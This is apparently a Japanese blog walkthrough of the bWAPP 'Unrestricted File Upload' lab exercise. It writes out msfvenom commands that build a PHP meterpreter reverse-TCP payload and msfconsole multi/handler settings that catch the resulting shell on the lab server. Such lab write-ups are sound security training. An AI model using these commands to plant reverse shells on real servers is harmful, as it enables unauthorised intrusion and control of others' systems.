shikata ga nai

Private? There is no such things.

bWAPPでOther bugs-Unrestricted File Uploadをやってみた

Hello there, ('ω')ノ

 

Unrestricted File Uploadを。

画像ファイル以外になんでもアップロードできるので脆弱性ありなのですが。

 

f:id:ThisIsOne:20210720121737p:plain

 

ここからがペネトレーションテストの領域で。

まずは、ペイロードのモジュールを一覧表示させて。

 msfvenom -l payloads

 

f:id:ThisIsOne:20210720115123p:plain

 

今回は、この中からチョイスしょうと。

 

f:id:ThisIsOne:20210720115450p:plain

 

使用するペイロードのオプションの確認を。

 msfvenom -p php/meterpreter/reverse_tcp --payload-options

 

f:id:ThisIsOne:20210720120121p:plain

 

ここで一応、IPアドレスの確認をしておいて。

 

f:id:ThisIsOne:20210720115842p:plain

 

ペイロードのプログラムファイルを作成することに。

 msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.16 LPORT=4444 R > exploit.php

 

f:id:ThisIsOne:20210720115956p:plain

 

作成したファイルをbWAPPにアップロードして。

 

f:id:ThisIsOne:20210720120237p:plain

 

次に下記を起動して。

 msfconsole

 

f:id:ThisIsOne:20210720120433p:plain

 

今回は、exploit/multi/handlerを使いたいので。

下記の手順で、ペイロードタイプやローカルホストのIPアドレス等を設定して。

最後にexploitでリスナーを起動して。

 

 use exploit/multi/handler
 set payload php/meterpreter/reverse_tcp
 set lhost 192.168.0.16
 set lport 4444
 exploit

 

f:id:ThisIsOne:20210720120722p:plain

 

bWAPPでhereをクリックすると。

 

f:id:ThisIsOne:20210720121510p:plain

 

アップロードしたphpファイルが起動して。

 

f:id:ThisIsOne:20210720120938p:plain

meterpreterが起動してbWAPPのサーバに侵入することができて。

上記のページを落としても通信は継続されて。

 

f:id:ThisIsOne:20210720121049p:plain

 

Best regards, (^^ゞ

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain